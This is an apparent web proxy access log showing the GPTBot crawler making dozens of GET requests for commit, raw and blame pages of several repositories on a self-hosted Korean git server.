"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31283] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:13:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" +[17/Feb/2026:13:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" +[17/Feb/2026:13:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" +[17/Feb/2026:13:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" +[17/Feb/2026:13:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" +[17/Feb/2026:13:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 10129] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" +[17/Feb/2026:13:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38745] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23714] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" [Client 74.7.227.38] [Length 10112] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx" +[17/Feb/2026:13:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases.rss" [Client 74.7.227.38] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/releases" +[17/Feb/2026:13:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:38:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" +[17/Feb/2026:13:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 10121] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 22711] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" +[17/Feb/2026:13:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10989] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10991] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10989] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153439] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10646] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:13:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 25660] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:13:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" +[17/Feb/2026:13:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10861] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 21807] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" +[17/Feb/2026:13:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15178] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" +[17/Feb/2026:13:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:13:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] 